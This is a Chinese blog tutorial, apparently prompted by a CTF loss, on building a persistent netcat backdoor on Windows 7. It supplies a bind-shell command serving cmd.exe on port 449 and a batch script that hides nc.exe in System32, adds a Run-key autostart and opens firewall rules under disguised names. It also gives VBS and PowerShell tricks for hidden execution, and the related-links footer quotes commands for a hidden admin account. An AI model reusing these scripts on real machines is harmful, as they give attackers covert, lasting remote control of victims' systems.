windows下后门技术(netcat篇)

最新推荐文章于 2024-06-24 18:11:49 发布
最新推荐文章于 2024-06-24 18:11:49 发布
阅读量1.2w 收藏 8
点赞数
分类专栏: windows

由于这次ctf的失利,来补习一下知识吧!

windows下后门

环境 win7 nc.exe

假设用administrator登陆用nc创建了一个后门,Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题

便携式工具(Portable Applications)

便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一同打包成一个独立的文件,方便携带。在独立文件执行的过程中会自行释放额的需求文件,并构建一个可顺利执行目标程序的环境。 例如Python打包的exe文件

1.不依赖特定的dll(dll已经打包)
2.不依赖注册表设置(有可能自行初始化) ,不遗留下任何注册表操作痕迹
3.操作痕迹最小化,尽量避免一切不必要的操作,导致留下过多的系统操作记录

创建 Windows 7 工具集

1.Wget
2.gvim
3.nc

由于已经装过了 就不找下载连接了

0×01初试 Netcat 后门

nc.exe -dLp 449 -e cmd.exe

一般在windows下第一次使用NC的时候会提示你 是否允许访问网络 如果选择否 那就不行了

防火墙

这个时候我们就要对防火墙进行一些设置了

必须想到注册表设置啊

可以参考一下 这个

metasploit-persistent-netcat-backdoor

第一步 拷贝nc

C:\Users\Administrator>xcopy "%systemdrive%%homepath%\Desktop\1.bat" "C:\Windows
\System32\"

第二步 修改注册表

@echo off

Rem 拷贝文件到系统目录

xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y

Rem 修改注册表,增加后门自启动代码.

reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

Rem 添加防火墙规则,开放监听的449端口,允许外部连接.

netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449

Rem 添加防火墙规则,允许nc.exe对外提供连接.

netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"

注意:

1.必须使用管理员权限运行上面的脚本.

2.行为注释可删除

第三步 : 使用 VBS 脚本后台运行 Netcat

这样做的好处是我们不用等待电脑重启

Dim objShell
Set objShell = WScript.CreateObject("WScript.shell")
objShell.run "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Set objShell = Nothing

finall 使用 Netcat 连接后门

nc-v 目标IP 目标端口

nc

以后 就可以直接连接了

下面来介绍几种不使用CMD运行命令或者批处理脚本的方法

Vbscript

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\mybat.bat" & Chr(34), 0
Set WshShell = Nothing

Batch

@echo off
start /B mybat.bat

powershell

PowerShell.exe -windowstyle hidden

这个文章里面有windows破坏的一些脚本

d_0xff
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Pwn | CTF】BUUCTF test_your_nc1
weixin_46301214的博客
01-31 685
nc命令是一个用于网络通信的命令行工具,全称为netcat。以上是nc命令的一些常用用法和参数,需要注意的是,nc命令在不同的操作系统上可能会有一些差异。还记得我以前第一次做pwn题目的时候,是真的懵逼,连接上之后没反应。这题直接连接就可以了,windows装了nc工具,直接耍。这里光标去了下一行,是已经连接上,在等你输入命令呢。下面给一点nc命令的解释,文心一言得出来的。天命:时隔两年,又杀回了pwn这里。然后正常查看 flag 文件就行了。拿到题目的提示,测试你的nc工具。
netcat的使用
m0_60027772的博客
09-02 474
在网络中有瑞士军刀美誉的netcat,在我们用了N年后依然爱不释手,这是一个非常简单易用的基于TCP/IP协议的瑞士军刀。这里下载的时候会报出包含病毒,关闭杀毒软件忽略即可nc -h两台服务器可以互相访问,一台笔记本仅可以与右边的服务器进行相互访问,此时该笔记本想要与上面的服务器互相访问就需要借助右边的服务器进行连接转发。
Metasploit渗透测试之制作隐藏后门(一)——使用永恒之蓝漏洞对win7进行渗透
最新发布
qq_63831588的博客
06-24 591
kali,永恒之蓝,漏洞利用,后门,远程连接,木马
瑞士军刀——Netcat的安装与详细使用
永不落的梦想
08-02 4636
瑞士军刀——Netcat的安装与使用,多种功能介绍
利用ms17-010 远程执行漏洞渗透Win7,并留下后门
qq_40624810的博客
07-18 4370
一、环境准备 主机 kali :192.168.115.134 靶机win7x64:192.168.115.133 二、渗透 Metasploit 指令学习:https://blog.csdn.net/tan6600/article/details/46845793 这里利用的是win7的ms17-010 远程执行漏洞 先使用auxiliary/scanner/smb/smb_ms17...
Windows下安装使用netcat
junR_980218的博客
06-20 7025
Windows下安装使用netcat
windows下nc工具netcat
08-07
windows下nc工具,可用来端口监听、转发等功能,小巧强大
windows下的netcat
11-24
windows下的netcat
netcat windows
03-21
netcat windows系统,与linux系统之间文件传输,快捷方便
Netcat for windows 32/64 bit
04-04
Netcat for windows 32/64 bit
NetCat后门工具
01-25
Netcat,Windows后门工具,希望能够遵守相关法律,谢谢
netcat瑞士军刀for windows
12-02
netcat瑞士军刀for windows,此工具功能那是相当的强大. netcat for windows. 此包中包含两个版本, 一个版本不带-e参数, 另一个参数比较全.
windows操作系统常见持久性后门
weixin_42282189的博客
10-14 2563
windows操作系统常见持久性后门 0x00 简介 ​ 当我们拿到域中最高权限之后,就需要将自己的权限进行巩固,进行权限持久化操作。 0x01 隐藏账户 1.1 测试系统 win 7 1.2 新建特殊账户 在目标主机cmd中输入以下命令,创建一个名为whoami$的隐藏账户,并把该隐藏账户设置为管理员权限 net user whoami$ howe7 /add net localgroup administrators whoami$ /add ​ 注:创建的用户名必须以$符
Windows后门--教程(三)——Windows服务后门
W小哥
03-16 6747
一、Windows服务后门介绍 在Windows系统中还有一个重要的机制,就是服务。通常大部分的服务都拥有SYSTEM权限,如果攻击者利用Windows的服务机制创建一个后门服务,那么这个后门将比一般的持久化方法更为强健。 二、Windows服务后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 靶机: windows Server2012 IP: 192.168.226.128 攻击机: kali IP: 192.168.226.131
安全渗透测试-win7
liuguangshibei的博客
06-24 2510
攻击机:kali 靶机:windows7x64 靶机开放服务:Apache2.4.39、MySQL5.7.26采用工具:nmap、nessus,msf 攻击方式:后门利用
Windows安装NetCat
热门推荐
大头皮鞋的博客
05-18 1万+
Window系统默认没有安装NetCat,在cmd命令窗口输入nc提示不是内部或外部命令 C:\Users\Administrator>nc 'nc' 不是内部或外部命令,也不是可运行的程序 或批处理文件。 1.下载NetCat 下载网址:https://eternallybored.org/misc/netcat/ 或者点这里下载提取码32ol 下载后的文件如下,...
CTFshow-PWN入门-Test_your_nc详解
weixin_63576152的博客
07-29 1378
本文主要详解CTFshow中pwn入门第一块内容Test_your_nc的五道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境(小编的轻薄本已经容不提供的专用虚拟机了QAQ)
使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透及建立永久后门
Cwillchris的博客
05-28 622
最详细永恒之蓝渗透和后渗透教程
windows netcat
08-18
Windows Netcat是一款在Windows环境下运行的工具,它是一款简单的Unix工具,使用UDP和TCP协议。它可以作为后台操作工具,同时也可以用作网络测试工具或黑客工具。 安装Windows Netcat的步骤如下: 1. 关闭Windows防火墙:打开“Windows安全中心”-“病毒和威胁防护”-将“实时保护”关闭。 2. 下载安装包:可以从官网下载,也可以使用提供的软件包。 3. 安装:将安装包解压到一个无中文目录的文件夹下,然后将解压后的netcat路径添加到系统环境变量中的"Path"中。 4. 测试:打开命令提示符窗口,输入"nc -lp 9999"命令来监听9999端口,并在另一个命令提示符窗口中输入"nc localhost 9999"命令来接收数据。 以上是安装和使用Windows Netcat的步骤。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【windows-nc】windows环境netcat(nc)安装](https://blog.csdn.net/AFiveStudy/article/details/129272607)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [windows netcat](https://download.csdn.net/download/w609177135/4465976)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [windows下安装使用netcat](https://blog.csdn.net/wokoone/article/details/127661145)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值